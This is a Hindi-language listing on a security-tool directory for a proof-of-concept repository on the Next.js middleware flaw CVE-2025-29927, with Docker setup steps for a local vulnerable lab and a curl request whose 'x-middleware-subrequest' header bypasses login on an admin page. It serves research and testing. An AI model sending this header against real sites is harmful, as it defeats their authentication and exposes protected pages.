Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nextjs-middleware-exploit — Next.js मिडलवेयर भेद्यता (CVE-2025-29927) पर शोध जो प्राधिकरण बाईपास और संभावित शोषण की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/l1uk/nextjs-middleware-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubl1uk/nextjs-middleware-exploit

nextjs-middleware-exploit

Next.js मिडलवेयर भेद्यता (CVE-2025-29927) पर शोध जो प्राधिकरण बाईपास और संभावित शोषण की अनुमति देता है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Next.js मिडलवेयर भेद्यता अनुसंधान (CVE-2025-29927)

यह रिपॉजिटरी Next.js मिडलवेयर में एक महत्वपूर्ण भेद्यता (CVE-2025-29927) का प्रदर्शन करती है, जो संस्करण 11.1.4 से 15.1.7 तक प्रभावित करती है। यह भेद्यता प्राधिकरण बाईपास, CSP बाईपास, और कैश-पॉइज़निंग के माध्यम से संभावित DoS हमलों की अनुमति देती है। समस्या x-middleware-subrequest हेडर के प्रबंधन के तरीके से उत्पन्न होती है, जिससे हमलावर मिडलवेयर सुरक्षा तंत्र को बायपास कर सकते हैं।

यह प्रूफ ऑफ कॉन्सेप्ट v12 में भेद्यता के लिए विशिष्ट है।

उपयोग

पर्यावरण सेटअप

डॉकर और इस रिपो से फ़ाइलों का उपयोग करके कमजोर वातावरण सेटअप करें, निम्नलिखित चलाकर:

root@kitploit:~
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app

शोषण

इस रिपॉजिटरी में भेद्यता के शोषण का परीक्षण करने के लिए पहले से बनाई गई exploit.sh स्क्रिप्ट है। इसका परीक्षण करने के लिए चलाएँ:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

इसके अतिरिक्त आप निम्नलिखित प्रयास करके भेद्यता के शोषण का परीक्षण कर सकते हैं:

  1. प्रमाणीकरण के बिना एडमिन पेज का अनुरोध करें। आपको लॉगिन पेज पर रीडायरेक्ट किया जाना चाहिए।
root@kitploit:~
curl -i http://localhost:3000/admin
  1. प्रमाणीकरण के बिना लेकिन x-middleware-subrequest हेडर का उपयोग करके पेज का अनुरोध करें। आप प्रमाणीकरण पेज को बायपास करने में सक्षम होना चाहिए।
root@kitploit:~
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin

सुरक्षा सलाह

  • CVE-2025-29927: सुरक्षा सलाह लिंक
टूल डाउनलोड करें